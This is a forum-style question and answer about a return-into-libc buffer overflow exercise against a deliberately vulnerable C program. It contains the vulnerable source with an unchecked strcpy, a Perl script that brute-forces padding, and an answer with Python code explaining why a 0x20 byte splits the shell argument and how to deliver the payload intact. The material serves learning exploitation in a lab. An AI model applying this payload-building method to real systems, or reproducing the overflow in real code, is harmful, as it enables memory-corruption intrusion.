I am messing around with buffer overflows and I’m trying to execute a return into libc vulnerability. To aid me, I have devised the following perl script:
#!/usr/bin/perl
# Try padding lengths 1..199 in front of the overwrite.
for ($i = 1; $i < 200; $i++) {
    print "count: $i\n";
    # After the A padding: 0x08048320 (little-endian), then AAAA, then
    # 0xbffff95c (little-endian), i.e. the usual return-into-libc layout of
    # function address, fake return address, argument pointer.
    # The whole payload is pasted unquoted into a shell command string.
    system("echo 1 | ./vuln " . "A"x$i . "\x20\x83\x04\x08AAAA\x5c\xf9\xff\xbf");
}
Here is the code I am targeting (./vuln):
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char buffer[80];            /* 80 bytes; copied into without a bounds check */

    if (argc < 2)
        return 1;

    /* Print what actually arrived in argv[1]: its length, then its contents. */
    printf("%d\n%s\n", (int)strlen(argv[1]), argv[1]);
    getchar();                  /* pause for one byte of stdin; the script pipes "1" in */
    strcpy(buffer, argv[1]);    /* deliberate overflow: no length check */
    return 1;
}
And this is the output of the script:
count: 1
1
A
count: 2
2
AA
count: 3
3
AAA
count: 4
4
AAAA
count: 5
5
AAAAA
This indicates that no part of the last string concatenated (the one with lots of hex characters) is being successfully passed as an argument.
What am I doing wrong here?
try this:
0x20 is space, so without the quotes everything after that is a separate argument.
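To make the splitting concrete, here is an added Python example; it is not code from the question or the answer. It builds the same payload bytes the question uses (0x08048320, AAAA, 0xbffff95c), models what `sh -c` does to the command string with `shlex`, and shows the two ways of getting the bytes through intact: single-quoting the argument, or skipping the shell entirely with a list-form `subprocess.run`. The `./vuln` path and the `run_target` helper are assumptions for illustration; nothing here needs the binary except `run_target` itself.

```python
import shlex
import struct
import subprocess

# Values copied from the question's script, as 32-bit little-endian words.
FUNC_ADDR = 0x08048320   # packs to "\x20\x83\x04\x08": the first byte is a space
FAKE_RET = b"AAAA"       # return address seen by the function we return into
ARG_ADDR = 0xbffff95c    # packs to "\x5c\xf9\xff\xbf": 0x5c is a backslash


def build_payload(pad_len, func_addr=FUNC_ADDR, fake_ret=FAKE_RET, arg_addr=ARG_ADDR):
    """return-into-libc layout: [padding][function address][fake return][argument].

    argv strings are NUL-terminated C strings, so a payload containing 0x00 can
    never be delivered through argv at all; refuse it instead of silently
    truncating at the NUL.
    """
    payload = (b"A" * pad_len
               + struct.pack("<I", func_addr)
               + fake_ret
               + struct.pack("<I", arg_addr))
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte; it cannot cross argv")
    return payload


def shell_argv(command):
    """Model what 'sh -c command' hands to execve(): POSIX word splitting,
    quote removal and backslash processing, as implemented by shlex.split.
    The command is a str; payload bytes are mapped 1:1 via latin-1."""
    return shlex.split(command)


def unquoted_command(payload, target="./vuln"):
    """The question's construction: the payload pasted bare into the command.
    The 0x20 byte splits it into two words; the 0x5c byte escapes the byte
    after it, so argv[2] loses the backslash as well."""
    return target + " " + payload.decode("latin-1")


def quoted_command(payload, target="./vuln"):
    """Single-quote the payload so the shell passes it as one word. Inside
    single quotes the backslash is literal too, so every byte survives."""
    return target + " " + shlex.quote(payload.decode("latin-1"))


def run_target(payload, target="./vuln", stdin=b"1\n"):
    """Preferred fix: no shell at all. execve() gets the argument list as-is,
    so neither the space nor the backslash is interpreted. stdin feeds the
    getchar() call in the target (the 'echo 1 |' of the original script).
    Assumed helper: target path is whatever you compiled the C program to."""
    return subprocess.run([target, payload], input=stdin, capture_output=True)


if __name__ == "__main__":
    p = build_payload(4)
    print("unquoted argv:", shell_argv(unquoted_command(p)))
    print("quoted argv:  ", shell_argv(quoted_command(p)))
```

The same two fixes apply in Perl: either wrap the payload in single quotes inside the command string (single quotes, because the 0x5c byte is a backslash and double quotes would still let the shell process it), or call the program with the list form of `system`/`exec`, which goes straight to `execve` without a shell. The list form does not take a pipe, so the `echo 1 |` part then has to be replaced by writing to the child's stdin directly.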